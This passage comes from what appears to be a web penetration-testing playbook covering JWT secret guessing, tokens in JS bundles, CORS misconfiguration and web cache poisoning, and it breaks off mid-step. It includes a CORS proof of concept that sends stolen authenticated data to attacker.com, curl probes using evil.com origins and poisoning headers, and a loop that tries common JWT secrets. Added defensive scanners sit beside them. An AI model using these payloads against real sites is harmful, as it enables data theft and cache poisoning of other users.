&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;import hmac, hashlib, base64, json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;def verify_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token, secret&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;parts&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; token.split&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header_b64, payload_b64, &lt;span style="color:#f2d5cf"&gt;sig_b64&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; parts
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;sig_check&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64.urlsafe_b64encode&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hmac.new&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;secret.encode&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;, f&lt;span style="color:#a6d189"&gt;&amp;#39;{header_b64}.{payload_b64}&amp;#39;&lt;/span&gt;.encode&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;, hashlib.sha256&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.digest&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.rstrip&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;b&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.decode&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;sig_check&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; sig_b64
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test common secrets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; secret in &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;secret&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;jwt_secret&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;password&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;changeme&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;supersecret&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; verify_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token, secret&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; print&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 Secret found: {secret}&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Hardcoded JWTs in the delivery platform&amp;rsquo;s JS bundle — 2 HS256 tokens with &lt;code&gt;appName&lt;/code&gt; and &lt;code&gt;tokenVersion&lt;/code&gt;, used as &amp;ldquo;app tokens&amp;rdquo; to authenticate BFF API requests. The server blindly trusted these tokens.&lt;/p&gt;
&lt;h3 id="165-jwt-in-javascript-bundles" &gt;
&lt;div&gt;
&lt;a href="#165-jwt-in-javascript-bundles"&gt;
##
&lt;/a&gt;
16.5 JWT in JavaScript Bundles
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;JWTs found in client-side code are often used as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;App tokens&lt;/strong&gt;: identify which application is calling the API&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Anon tokens&lt;/strong&gt;: &amp;ldquo;anonymous user&amp;rdquo; tokens&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dev tokens&lt;/strong&gt;: forgotten by developers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Always extract and analyze JWTs from JS bundles. Even if the secret cannot be cracked, the payload reveals the structure and can be reused.&lt;/p&gt;
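&lt;p&gt;The same extraction belongs in a release pipeline: if a scanner can pull tokens out of a bundle, so can anyone who downloads it. The block below is an added example, not code from this playbook, that finds JWT-shaped strings in a constructed bundle, decodes header and payload without trusting either, and reports algorithm, claim names and expiry state so a CI job can fail the build on an app token that never expires. The bundle text and tokens are constructed; the signature segments are dummies because the scan only decodes.&lt;/p&gt;

```python
"""Find and triage JWTs shipped inside a JavaScript bundle (added example).

Meant as a pre-release or CI check. The bundle text is constructed and the
tokens in it carry a dummy signature segment because the scan never
verifies signatures, it only decodes.
"""
import base64
import json
import re

# Three base64url segments; a header that encodes a JSON object starts
# with "eyJ" (base64 of the bytes '{"').
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]*")


def _segment(obj):
    """base64url-encode a JSON object without padding (builds the samples)."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _decode_segment(segment):
    return json.loads(base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4)))


# Constructed bundle: an "app token" with no exp, then an expired "anon token".
SAMPLE_BUNDLE = (
    'const API="https://api.example.org";'
    'const APP_TOKEN="' + _segment({"alg": "HS256", "typ": "JWT"}) + "."
    + _segment({"appName": "web", "tokenVersion": 2}) + '.c2lnbmF0dXJl";'
    'const ANON="' + _segment({"alg": "HS256"}) + "."
    + _segment({"sub": "anon", "exp": 1500000000}) + '.c2lnbmF0dXJl";'
)


def find_jwts(bundle_text, now):
    """Return one finding per token: offset, alg, claim names, expiry state."""
    findings = []
    for match in JWT_RE.finditer(bundle_text):
        h_b64, p_b64, _sig = match.group(0).split(".")
        try:
            header, claims = _decode_segment(h_b64), _decode_segment(p_b64)
        except ValueError:
            continue  # JWT-shaped string that is not JSON: skip it
        if not isinstance(header, dict) or not isinstance(claims, dict):
            continue
        exp = claims.get("exp")
        findings.append({
            "offset": match.start(),
            "alg": header.get("alg"),
            "claims": sorted(claims),
            "expired": isinstance(exp, int) and now >= exp,
            "never_expires": exp is None,
        })
    return findings
```

A finding with never_expires set is the one to block on: an app token without a lifetime is effectively a permanent credential once the bundle is public.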
&lt;hr&gt;
&lt;h2 id="17-cors-misconfiguration" &gt;
&lt;div&gt;
&lt;a href="#17-cors-misconfiguration"&gt;
#
&lt;/a&gt;
17. CORS MISCONFIGURATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="171-how-to-test" &gt;
&lt;div&gt;
&lt;a href="#171-how-to-test"&gt;
##
&lt;/a&gt;
17.1 How to Test
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Origin reflected?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI -H &lt;span style="color:#a6d189"&gt;&amp;#34;Origin: https://evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/api/data&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;access-control&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Null origin accepted?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI -H &lt;span style="color:#a6d189"&gt;&amp;#34;Origin: null&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/api/data&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;access-control&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Credentials allowed?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If Access-Control-Allow-Credentials: true + reflected Origin = EXPLOITABLE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Preflight (OPTIONS) accepts sensitive methods?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI -X OPTIONS -H &lt;span style="color:#a6d189"&gt;&amp;#34;Origin: https://evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Access-Control-Request-Method: DELETE&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/api/data&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="172-cors-severity-levels" &gt;
&lt;div&gt;
&lt;a href="#172-cors-severity-levels"&gt;
##
&lt;/a&gt;
17.2 CORS Severity Levels
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Configuration&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Explanation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: *&lt;/code&gt; without credentials&lt;/td&gt;
&lt;td&gt;Info&lt;/td&gt;
&lt;td&gt;Public by design&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: https://evil.com&lt;/code&gt; (reflected)&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Without credentials, only public data is readable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: null&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Sandboxed iframe can exploit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: reflected&lt;/code&gt; + &lt;code&gt;ACAC: true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;High/Critical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Authenticated cross-origin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Preflight allows DELETE/PUT with credentials&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Critical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Authenticated cross-origin writes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="173-cors--credentials-proof-of-concept" &gt;
&lt;div&gt;
&lt;a href="#173-cors--credentials-proof-of-concept"&gt;
##
&lt;/a&gt;
17.3 CORS + Credentials Proof of Concept
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!-- Save as cors_poc.html and open in the browser --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// If the victim is logged in, the cookies will be sent
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fetch(&lt;span style="color:#a6d189"&gt;&amp;#39;https://target.com/wp-json/wp/v2/pages&amp;#39;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; credentials&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;include&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}).then(r =&amp;gt; r.json()).then(data =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;// Authenticated data extracted cross-origin
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.log(&lt;span style="color:#a6d189"&gt;&amp;#39;Stolen data:&amp;#39;&lt;/span&gt;, data);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fetch(&lt;span style="color:#a6d189"&gt;&amp;#39;https://attacker.com/collect&amp;#39;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; method&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;POST&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; JSON.stringify(data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government transparency portal — reflected Origin + &lt;code&gt;Access-Control-Allow-Credentials: true&lt;/code&gt; + all HTTP methods (GET, POST, PUT, PATCH, DELETE). Any malicious site could perform authenticated cross-origin POST as admin.&lt;/p&gt;
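&lt;p&gt;To turn the three probes from 17.1 into a rating with the table above, here is an added example (not the playbook's own code) that parses raw &lt;code&gt;curl -sI&lt;/code&gt; output and applies the rubric; the probe outputs it ships with are constructed, and &lt;code&gt;https://evil.com&lt;/code&gt; is the probe origin. One assumption beyond the table: a null origin accepted with credentials is rated High like a reflected one.&lt;/p&gt;

```python
# Added example (not the playbook's code): rate the three CORS probes from
# 17.1 with the 17.2 rubric. Input is raw `curl -sI` output; the samples
# below are constructed, and https://evil.com is the probe origin.
PROBE_ORIGIN = "https://evil.com"
WRITE_METHODS = {"PUT", "PATCH", "DELETE"}


def parse_headers(raw):
    """Turn curl -sI output into a dict with lower-cased header names."""
    headers = {}
    for line in raw.splitlines():
        if ":" not in line:          # status line or blank line
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def _allows_credentials(h):
    return h.get("access-control-allow-credentials", "").strip().lower() == "true"


def _allowed_methods(h):
    raw = h.get("access-control-allow-methods", "")
    return {m.strip().upper() for m in raw.split(",") if m.strip()}


def rate_cors(origin_resp, null_resp, preflight_resp):
    """Return (severity, explanation); the worst applicable rubric row wins.

    origin_resp    - headers for the request with Origin: https://evil.com
    null_resp      - headers for the request with Origin: null
    preflight_resp - headers for OPTIONS with Access-Control-Request-Method
    """
    acao = origin_resp.get("access-control-allow-origin")
    reflected = acao == PROBE_ORIGIN
    null_allowed = null_resp.get("access-control-allow-origin") == "null"
    pre_acao = preflight_resp.get("access-control-allow-origin")
    pre_untrusted = pre_acao in (PROBE_ORIGIN, "null")
    pre_writes = _allowed_methods(preflight_resp).intersection(WRITE_METHODS)

    # Row 5: cross-origin writes with the victim's cookies.
    if pre_untrusted and _allows_credentials(preflight_resp) and pre_writes:
        return "Critical", "preflight allows %s with credentials for an untrusted origin" % ", ".join(sorted(pre_writes))
    # Row 4: reflected origin + credentials = authenticated cross-origin read.
    # A null origin with credentials is rated the same here (assumption: a
    # sandboxed iframe gets origin null and can still send cookies).
    if (reflected and _allows_credentials(origin_resp)) or (null_allowed and _allows_credentials(null_resp)):
        return "High", "untrusted origin accepted with Access-Control-Allow-Credentials: true"
    # Row 3: null origin without credentials.
    if null_allowed:
        return "Medium", "Origin: null is accepted"
    # Row 2: reflection without credentials exposes only public data.
    if reflected:
        return "Low", "Origin is reflected but credentials are not allowed"
    # Row 1: wildcard; browsers refuse to pair '*' with credentials anyway.
    if acao == "*":
        return "Info", "Access-Control-Allow-Origin: * (public by design)"
    return "None", "no cross-origin access granted to untrusted origins"


# Constructed probe output for a vulnerable target (matches the 17.3 case).
VULN_ORIGIN = """HTTP/2 200
access-control-allow-origin: https://evil.com
access-control-allow-credentials: true
vary: Origin
"""
VULN_NULL = """HTTP/2 200
access-control-allow-origin: null
access-control-allow-credentials: true
"""
VULN_PREFLIGHT = """HTTP/2 204
access-control-allow-origin: https://evil.com
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, PATCH, DELETE
"""
# Constructed probe output for a correctly configured target.
SAFE = """HTTP/2 200
content-type: application/json
"""


def rate_from_curl(origin_raw, null_raw, preflight_raw):
    """Convenience wrapper taking the three raw curl outputs."""
    return rate_cors(parse_headers(origin_raw), parse_headers(null_raw),
                     parse_headers(preflight_raw))


if __name__ == "__main__":
    print(rate_from_curl(VULN_ORIGIN, VULN_NULL, VULN_PREFLIGHT))
    print(rate_from_curl(SAFE, SAFE, SAFE))
```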
&lt;hr&gt;
&lt;h2 id="18-web-cache-poisoning--web-cache-deception" &gt;
&lt;div&gt;
&lt;a href="#18-web-cache-poisoning--web-cache-deception"&gt;
#
&lt;/a&gt;
18. WEB CACHE POISONING &amp;amp; WEB CACHE DECEPTION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="181-web-cache-poisoning-wcp" &gt;
&lt;div&gt;
&lt;a href="#181-web-cache-poisoning-wcp"&gt;
##
&lt;/a&gt;
18.1 Web Cache Poisoning (WCP)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Poison the CDN cache to serve malicious content to ALL visitors.&lt;/p&gt;
&lt;h4 id="step-1-detect-the-cache" &gt;
&lt;div&gt;
&lt;a href="#step-1-detect-the-cache"&gt;
###
&lt;/a&gt;
Step 1: Detect the Cache
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Headers that indicate cache&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(age|x-cache|cf-cache-status|via|server)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Confirm that Age increments&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; i in &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt; 3; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;^age:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Header&lt;/th&gt;
&lt;th&gt;CDN/Proxy&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;X-Cache: Hit from cloudfront&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AWS CloudFront&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Cf-Cache-Status: HIT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cloudflare&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Age: N&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cache with active TTL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Via: 1.1 varnish&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Varnish&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="step-2-find-unkeyed-inputs-reflected-headers" &gt;
&lt;div&gt;
&lt;a href="#step-2-find-unkeyed-inputs-reflected-headers"&gt;
###
&lt;/a&gt;
Step 2: Find Unkeyed Inputs (Reflected Headers)
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Headers that are NOT part of the cache key but are reflected in the response:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;X-Forwarded-Host, X-Forwarded-Scheme, X-Forwarded-For,
X-Host, X-Original-URL, X-Rewrite-URL, Forwarded,
X-Forwarded-Port, X-Amz-Website-Redirect-Location,
X-HTTP-Method-Override, X-HTTP-Method, X-Method-Override
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test each header with a cache buster&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; header in &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Host: evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Scheme: http&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Host: evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Original-URL: /evil&amp;#34;&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;=== &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$header&lt;/span&gt;&lt;span style="color:#a6d189"&gt; ===&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$RANDOM&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$header&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; 2&amp;gt;&amp;amp;&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; | grep -c &lt;span style="color:#a6d189"&gt;&amp;#34;evil&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="step-3-prove-that-the-payload-stuck-in-cache" &gt;
&lt;div&gt;
&lt;a href="#step-3-prove-that-the-payload-stuck-in-cache"&gt;
###
&lt;/a&gt;
Step 3: Prove that the Payload Stuck in Cache
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Phase 1: Poison&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=POISON123&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Host: evil.com&amp;#34;&lt;/span&gt; &amp;gt; /dev/null
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Phase 2: Verify cache HIT (WITHOUT the malicious header!)&lt;/span&gt;
